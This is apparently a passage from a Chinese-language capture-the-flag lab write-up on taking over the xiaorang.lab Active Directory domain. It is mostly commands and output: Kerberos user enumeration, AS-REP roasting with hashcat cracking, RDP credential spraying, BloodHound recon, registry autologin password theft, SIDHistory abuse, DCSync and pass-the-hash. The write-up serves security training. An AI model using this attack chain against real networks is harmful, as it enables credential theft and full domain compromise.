meterpreter > execute -i -H -f /home/neo4j/kerbrute_linux_amd64 -a "userenum --dc 172.22.6.12 -d xiaorang.lab /home/neo4j/user.txt"
Process 35652 created.
Channel 13 created.
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 05/18/23 - Ronnie Flathers @ropnop
2023/05/18 11:35:25 > Using KDC(s):
2023/05/18 11:35:25 > 172.22.6.12:88
2023/05/18 11:35:25 > [+] VALID USERNAME: weixian@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: shuzhen@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: gaiyong@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: xiqidi@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: wengbang@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: xuanjiang@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: yuanchang@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: lvhui@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: wenbo@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: zhenjun@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: jinqing@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: yangju@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: weicheng@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: weixian@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: jizhen@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: haobei@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: jingze@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: rubao@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: zhaoxiu@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: tangshun@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: qiyue@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: liangliang@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: jicheng@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: chouqian@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: beijin@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: xiyi@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: chenghui@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: chebin@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: pengyuan@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: yanglang@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: duanmuxiao@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: jihuan@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: hongzhi@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: gaijin@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: zhufeng@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: tangrong@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: yifu@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: luwan@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: lili@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: lianhuangchen@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: dongcheng@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: rangsibo@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: huabi@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: fusong@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: wohua@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: haoguang@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: wenshao@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: langying@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: diaocai@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: lianggui@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: baqin@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: manxue@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: weishengshan@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: louyou@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: chengqiu@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: chuyuan@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: wenbiao@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: maqun@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: yulvxue@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: wenliang@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: luyue@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: pangzhen@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: ganjian@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: lezhong@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: guohong@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: sheweiyue@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: dujian@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: lidongjin@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: hongqun@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: yexing@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: maoda@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: qiaomei@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: zhangxin@xiaorang.lab
2023/05/18 11:35:25 > [+] VALID USERNAME: ganjian@xiaorang.lab
2023/05/18 11:35:25 > Done! Tested 500 usernames (74 valid) in 0.058 seconds
AS-REP Roasting
尝试使用 AS-REP Roasting 从指定的用户名列表中,收集配置了“不需要预身份验证”用户的 AS_REP 响应:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(root㉿kali)-[~]
└─# proxychains4 -q impacket-GetNPUsers xiaorang.lab/ -dc-ip 172.22.6.12 -usersfile user.txt -format hashcat -outputfile hashes.txt
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] User weixian@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User shuzhen@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User gaiyong@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User xiqidi@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User wengbang@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User xuanjiang@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User yuanchang@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lvhui@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User wenbo@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User zhenjun@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User jinqing@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
......
这些响应将使用用户的密码进行加密,可以使用 hashcat 进行离线破解:
1
2
3
4
┌──(root㉿kali)-[~]
└─# hashcat -m 18200 hashes.txt rockyou.txt --show
$krb5asrep$23$wenshao@xiaorang.lab@XIAORANG.LAB:1c7b0758558a343ae9818ba9651671e0$74d2e04c05cf4b70aa1b3a8a29ca50bd8b72c9c3d0f6edfa1c5e0291173e073718c88d8f9289324d22a32fd3da70fdb0acdc11572540e53b69bab9c114dc3800b2a4e707cdc90c92c395efa6a81febe061c12563bdb22061422b51e6985efcc39207655152b9e07bc51fe9dbc696415c6c444a7eda4e3d65cef2a21ed0b9db129abfa224d573cb2ff241198c1bb9fd15f8cf8a5a2023e6b1404086edd6bbdda6d1d8bb94bc97a242ca2df79b0d32df1c9959cf7f7326615f8df5b241394705a61d732283731670c644f54d1f71786fe4ad40829245bb846d1b7da55988ead0a9ce3c4984e3d3cf2be400b0dc:hellokitty
$krb5asrep$23$zhangxin@xiaorang.lab@XIAORANG.LAB:1d877fa7ed93abba0b6eea699e59115b$b1118c32f1356e3f85bd415396ba79efd50ff5031b3a9bd2e98fe8ab45e0aba9eb7abac99116a2991f284fb6c98e7265849a5718bda72a3092c2d5eef012cb8696d01a79894326ac3a7c0d333ba9ba97407bcd65c3299b67978af9d053b0c000660caa03d0a4e97b10f18f0fb81defd52ec01727f94e38fbfaead6b65c934e8d22382b85d59e12f88164fee3cc48888164a3ca5cd43fcf551ec411655293cec72ea8f96e208fb875ac23079511ced4642fb9997ad63eafd16517203753a77530259c31291381dbc8269f07ad3ba89932a017756252e38c108592aaaa4ac9c84f4c50603fd5d26b725fdfc4aa:strawberry
| 账号 | 密码 |
|---|---|
| wenshao@xiaorang.lab | hellokitty |
| zhangxin@xiaorang.lab | strawberry |
可以登录主机 WIN2019$:
1
2
3
4
5
6
7
┌──(kali㉿kali)-[~]
└─$ proxychains4 -q cme rdp 172.22.6.38/24 -u user.txt -p pass.txt --no-bruteforce
RDP 172.22.6.25 3389 WIN2019 [*] Windows 10 or Windows Server 2016 Build 17763 (name:WIN2019) (domain:xiaorang.lab) (nla:True)
RDP 172.22.6.12 3389 DC-PROGAME [*] Windows 10 or Windows Server 2016 Build 14393 (name:DC-PROGAME) (domain:xiaorang.lab) (nla:True)
RDP 172.22.6.25 3389 WIN2019 [+] xiaorang.lab\wenshao:hellokitty (Pwn3d!)
RDP 172.22.6.12 3389 DC-PROGAME [+] xiaorang.lab\wenshao:hellokitty
RDP 172.22.6.12 3389 DC-PROGAME [+] xiaorang.lab\zhangxin:strawberry
AD recon with BloodHound
域环境分析:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
PS C:\Users\wenshao\Desktop> .\SharpHound.exe -c all
2023-05-18T14:27:27.2072983+08:00|INFORMATION|This version of SharpHound is compatible with the 4.2 Release of BloodHound
2023-05-18T14:27:27.3799607+08:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2023-05-18T14:27:27.3957557+08:00|INFORMATION|Initializing SharpHound at 14:27 on 2023/5/18
2023-05-18T14:27:27.5525204+08:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2023-05-18T14:27:27.7100612+08:00|INFORMATION|Beginning LDAP search for xiaorang.lab
2023-05-18T14:27:27.7570758+08:00|INFORMATION|Producer has finished, closing LDAP channel
2023-05-18T14:27:27.7725786+08:00|INFORMATION|LDAP channel closed, waiting for consumers
2023-05-18T14:27:58.4591622+08:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 36 MB RAM
2023-05-18T14:28:12.5330660+08:00|INFORMATION|Consumers finished, closing output channel
2023-05-18T14:28:12.5988949+08:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2023-05-18T14:28:12.7316697+08:00|INFORMATION|Status: 166 objects finished (+166 3.688889)/s -- Using 43 MB RAM
2023-05-18T14:28:12.7316697+08:00|INFORMATION|Enumeration finished in 00:00:45.0209904
2023-05-18T14:28:12.8119456+08:00|INFORMATION|Saving cache with stats: 124 ID to type mappings.
126 name to SID mappings.
1 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2023-05-18T14:28:12.8275552+08:00|INFORMATION|SharpHound Enumeration Completed at 14:28 on 2023/5/18! Happy Graphing!
HasSession
用户 YUXUAN@XIAORANG.LAB 在计算机 WIN2019.XIAORANG.LAB 上有一个会话。可以尝试通过 LSASS 注入、令牌窃取或注入用户进程等方式来检索凭据。
在 C:\Users 目录下找到该用户的目录:
该域用户在当前主机上设置了自动登录,MSF 模块可以从注册表中获取到明文密码:
1
2
3
4
5
meterpreter > run post/windows/gather/credentials/windows_autologin
[*] Running against WIN2019 on session 1
[+] AutoAdminLogon=1, DefaultDomain=xiaorang.lab, DefaultUser=yuxuan, DefaultPassword=Yuxuan7QbrgZ3L
meterpreter >
也可以直接读取注册表位置,获取到配置用于自动登录的明文密码:
1
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
| 账号 | 密码 |
|---|---|
| xiaorang.lab\yuxuan | Yuxuan7QbrgZ3L |
HasSIDHistory
域用户 YUXUAN 在其 SIDHistory 属性中具有域管理员 ADMINISTRATOR 的 SID。当为 YUXUAN 创建一个 kerberos 票证时,它将包含 ADMINISTRATOR 的 SID,因此授予 YUXUAN 与 ADMINISTRATOR 相同的特权和权限。
SID History 是在域之间迁移安全主体时使用的合法机制,以保持引用其先前 SID 的所有授权正常运行。
在穿越域信任边界时,如果两个域之间的域信任强制执行 SID 过滤,则此攻击将不起作用,因为域用户的 kerberos 票证 PAC 的 ExtraSIDs 部分中的 SID 将被忽略。
1
2
3
4
5
6
┌──(root㉿kali)-[~]
└─# proxychains4 -q cme rdp 172.22.6.38/24 -u yuxuan -p Yuxuan7QbrgZ3L
RDP 172.22.6.12 3389 DC-PROGAME [*] Windows 10 or Windows Server 2016 Build 14393 (name:DC-PROGAME) (domain:xiaorang.lab) (nla:True)
RDP 172.22.6.25 3389 WIN2019 [*] Windows 10 or Windows Server 2016 Build 17763 (name:WIN2019) (domain:xiaorang.lab) (nla:True)
RDP 172.22.6.12 3389 DC-PROGAME [+] xiaorang.lab\yuxuan:Yuxuan7QbrgZ3L (Pwn3d!)
RDP 172.22.6.25 3389 WIN2019 [+] xiaorang.lab\yuxuan:Yuxuan7QbrgZ3L (Pwn3d!)
DCSync
该账号可以登录域控主机 DC-PROGAME$,并且有权限直接查看 flag:
1
2
3
4
5
6
7
8
9
10
11
12
13
Awesome! you got the final flag.
:::::::::::::::::::::::::: :::: ::::::::::
:+: :+: +:+:+: :+:+:+:+:
+:+ +:+ +:+ +:+:+ +:++:+
+#+ +#+ +#+ +:+ +#++#++:++#
+#+ +#+ +#+ +#++#+
#+# #+# #+# #+##+#
### ############## #############
flag04: flag{17c2c7eb-6dcf-4c08-9c18-35a91a01b8ac}
注:使用域用户 yuxuan 的凭据可以登录 WIN2019.XIAORANG.LAB 主机,但进不去本地 administrator 用户家目录,有点疑惑 😶🌫️。
现在还没有第三个 flag,使用 yuxuan 的账号打 dcsync:
1
2
3
4
5
6
7
meterpreter > dcsync_ntlm administrator
[+] Account : administrator
[+] NTLM Hash : 04d93ffd6f5f6e4490e0de23f240a5e9
[+] LM Hash : <NOT FOUND>
[+] SID : S-1-5-21-3623938633-4064111800-2925858365-500
[+] RID : 500
使用域管凭据 PTH 登录主机 WIN2019$:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(root㉿kali)-[~]
└─# proxychains4 -q impacket-wmiexec xiaorang.lab/Administrator@172.22.6.25 -hashes :04d93ffd6f5f6e4490e0de23f240a5e9 -codec gbk
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>
......
C:\users\Administrator\flag>type flag03.txt
flag03: flag{2f6c2b5a-092d-4902-af29-d7603f309d39}
Maybe you can find something interesting on this server.
=======================================
What you may not know is that many objects in this domain
are moved from other domains.
C:\users\Administrator\flag>
本文由作者按照 CC BY 4.0 进行授权